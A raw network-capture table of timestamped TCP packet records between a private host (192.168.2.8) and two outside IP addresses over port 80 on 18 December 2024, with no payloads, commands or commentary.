Dec 18, 2024 13:38:47.263065100 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.263719082 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.264198065 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.264313936 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.264348984 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.264422894 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.265254021 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.265340090 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.265418053 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.265469074 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.266529083 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.266787052 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.266865969 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.267591000 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.267751932 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.267815113 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.268802881 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.268929005 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.269030094 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.269926071 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.270016909 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.270088911 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.271104097 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.271190882 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.271322966 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.271430969 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.272300959 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.272423983 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.272497892 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.273469925 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.273669004 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.273746014 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.274832964 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.274887085 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.274931908 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.274976015 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.275773048 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.275952101 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.276029110 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.277034044 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.277152061 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.277256966 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.278235912 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.278407097 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.278476000 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.279361010 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.279546022 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.279632092 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.280455112 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.280636072 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.280735016 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.281639099 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.281697989 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.281785011 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.283807993 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.283890963 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.284034014 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.284282923 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.284300089 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.284456968 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.284456968 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.285634995 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.285707951 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.285818100 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.285864115 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.286494017 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.286593914 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.286721945 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.287497997 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.287676096 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.287755966 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.288664103 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.291820049 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.316365004 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.319788933 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:47.320904016 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:47.419889927 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.419994116 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.420140028 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.420353889 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.420583010 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.420686007 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.421555996 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.421745062 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.421781063 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.422723055 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.422817945 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.422903061 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.424072981 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.424134970 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.424134970 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.424211979 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.425210953 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.425309896 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.425441027 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.426321030 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.426410913 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.426512957 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.427426100 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.427546024 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.427558899 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.428539991 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.428647041 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.428678036 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.429745913 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.429835081 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.429867983 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.429944992 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.430918932 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.431019068 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.431150913 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.432040930 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.432158947 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.432200909 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.432259083 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.433204889 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.433281898 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.433346987 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.433424950 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.434371948 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.434551001 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.434573889 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.435549021 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.435616970 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.435755968 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.436712980 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.436791897 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.436969995 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.437027931 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.437922955 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.438072920 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.438292980 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.439071894 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.439250946 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.439337969 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.440270901 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.440387011 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.440448999 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.440737963 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.440752029 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.440763950 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.440777063 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.440810919 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.440835953 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.440841913 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:47.440849066 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.440872908 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.440884113 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:47.440924883 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.440936089 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:47.440994024 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:47.441040039 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.441054106 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.441111088 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:47.441459894 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.441662073 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.441754103 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.442604065 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.442774057 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.442894936 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.443851948 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.443932056 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.443968058 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.445110083 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.445221901 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.445420027 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.446027040 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.446053028 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.446225882 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.446302891 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.447283983 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.447402954 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.447500944 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.448393106 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.448448896 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.448571920 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.449672937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.449743032 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.449842930 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.450107098 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.450721979 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.450922012 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.450973034 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.451931000 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.452132940 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.452200890 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.453162909 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.453244925 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.453274965 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.454273939 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.454339027 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.454461098 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.455420971 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.455549002 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.455591917 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.455652952 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.456615925 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.456839085 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.457005978 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.457856894 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.458000898 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.458028078 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.458688974 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.459033966 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.459218979 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.459248066 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.460150003 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.460288048 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.460336924 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.461324930 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.461400986 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.461519003 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.461580038 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.462619066 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.462740898 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.462801933 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.463705063 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.463923931 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.464306116 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.464840889 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.464900970 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.465051889 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.465987921 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.466007948 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.466061115 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.466159105 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.466219902 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.467191935 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.467325926 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.467325926 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.468333960 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.468413115 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.468499899 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.469607115 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.469647884 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.469662905 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.469728947 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.470732927 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.470809937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.470935106 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.471839905 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.472057104 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.472160101 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.472985983 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.473037004 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.473243952 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.474148989 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.474230051 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.474373102 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.474720955 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.475392103 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.475562096 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.475684881 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.476798058 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.476994038 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.477008104 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.477061987 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.477879047 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.477977037 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.477981091 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.478024006 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.478954077 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.479022980 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.479146957 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.479259968 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.480149984 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.480233908 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.480293036 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.480340958 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.481182098 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.481230974 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.560851097 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.560944080 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.560959101 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.561007977 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.561038017 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:47.561084986 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.561249018 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.561321020 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:47.601244926 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.601464033 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:47.612214088 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.612262011 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.612396002 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.612406015 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.612555981 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.612646103 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.613331079 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.613414049 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.613492966 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.614471912 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.614515066 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.614614964 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.614634037 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.614701033 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.615653038 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.615914106 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.616017103 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.616950989 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.617151022 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.617285967 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.617985964 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.618185997 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.618297100 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.619172096 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.619242907 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.619357109 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.620470047 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.620563030 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.620574951 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.621515989 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.621599913 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.621696949 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.621758938 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.622823000 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.622955084 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.623106003 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.623888969 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.624165058 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.624315023 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.625061989 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.625171900 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.625193119 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.625965118 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.626185894 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.626467943 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.626535892 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.627382994 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.627593040 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.627731085 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.628700972 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.628793955 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.628813028 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.629686117 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.629750013 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.629837990 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.630856991 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.630937099 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.631038904 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.631160975 CET	49723	80	192.168.2.8	31.41.244.11
